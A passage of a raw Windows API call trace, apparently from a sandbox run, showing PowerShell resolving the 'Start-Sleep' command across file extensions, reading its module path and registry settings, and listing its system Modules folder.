lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0264.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.485] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0264.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.WSF", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.WSF", lpFilePart=0x0) returned 0x3a [0264.485] GetFullPathNameW (in: lpFileName="Start-Sleep.WSF", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSF", lpFilePart=0x0) returned 0x34 [0264.485] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSF", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.486] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.487] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.WSF", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.487] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0264.488] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.488] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0264.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.488] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0264.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.WSH", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.WSH", lpFilePart=0x0) returned 0x3a [0264.488] GetFullPathNameW (in: lpFileName="Start-Sleep.WSH", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSH", lpFilePart=0x0) returned 0x34 [0264.488] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSH", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.488] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.489] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.WSH", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.489] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.489] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0264.489] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.490] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0264.490] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.490] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0264.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.MSC", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.MSC", lpFilePart=0x0) returned 0x3a [0264.490] GetFullPathNameW (in: lpFileName="Start-Sleep.MSC", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.MSC", lpFilePart=0x0) returned 0x34 [0264.490] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.MSC", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.490] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.491] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.MSC", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0264.491] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.491] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0264.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.492] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0264.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.CPL", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.CPL", lpFilePart=0x0) returned 0x3a [0264.492] GetFullPathNameW (in: lpFileName="Start-Sleep.CPL", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CPL", lpFilePart=0x0) returned 0x34 [0264.492] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CPL", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.492] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.493] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.CPL", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.493] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.493] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0264.493] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.493] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0264.493] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.493] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0264.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep", lpFilePart=0x0) returned 0x36 [0264.493] GetFullPathNameW (in: lpFileName="Start-Sleep", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep", lpFilePart=0x0) returned 0x30 [0264.493] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.494] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.494] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.495] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.495] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.498] CoTaskMemAlloc (cb=0x20e) returned 0x540310 [0264.498] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x540310, nSize=0x105 | out: lpBuffer="") returned 0x97 [0264.498] CoTaskMemFree (pv=0x540310) [0264.498] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b81e708 | out: phkResult=0x1b81e708*=0x680) returned 0x0 [0264.498] RegQueryValueExW (in: hKey=0x680, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b81e758, lpData=0x0, lpcbData=0x1b81e750*=0x0 | out: lpType=0x1b81e758*=0x1, lpData=0x0, lpcbData=0x1b81e750*=0x56) returned 0x0 [0264.498] RegQueryValueExW (in: hKey=0x680, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b81e758, lpData=0x22888c8, lpcbData=0x1b81e750*=0x56 | out: lpType=0x1b81e758*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b81e750*=0x56) returned 0x0 [0264.498] RegCloseKey (hKey=0x680) returned 0x0 [0264.506] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x1b81e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0264.506] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e720) returned 1 [0264.506] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x1b81e800 | out: lpFileInformation=0x1b81e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0264.507] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e6e0) returned 1 [0264.508] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0264.515] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x1b81e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0264.515] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e720) returned 1 [0264.515] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x1b81e800 | out: lpFileInformation=0x1b81e800*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0264.515] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e6e0) returned 1 [0264.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x1b81e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0264.515] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e720) returned 1 [0264.515] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x1b81e800 | out: lpFileInformation=0x1b81e800*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0264.515] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e6e0) returned 1 [0264.629] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e6a0) returned 1 [0264.629] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x1b81e190, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0264.629] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\", nBufferLength=0x105, lpBuffer=0x1b81e130, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\", lpFilePart=0x0) returned 0x33 [0264.629] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\*", lpFindFileData=0x1b81e340 | out: lpFindFileData=0x1b81e340*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8db020 [0264.631] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.631] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask", cAlternateFileName="APPBAC~1")) returned 1 [0264.631] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker", cAlternateFileName="APPLOC~1")) returned 1 [0264.631] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx", cAlternateFileName="")) returned 1 [0264.631] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess", cAlternateFileName="ASSIGN~1")) returned 1 [0264.632] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker", cAlternateFileName="BITLOC~1")) returned 1 [0264.632] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer", cAlternateFileName="BITSTR~1")) returned 1 [0264.632] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache", cAlternateFileName="BRANCH~1")) returned 1 [0264.632] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets", cAlternateFileName="CIMCMD~1")) returned 1 [0264.632] FindNextFileW (in: hFindFile=0x1a8db020, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, 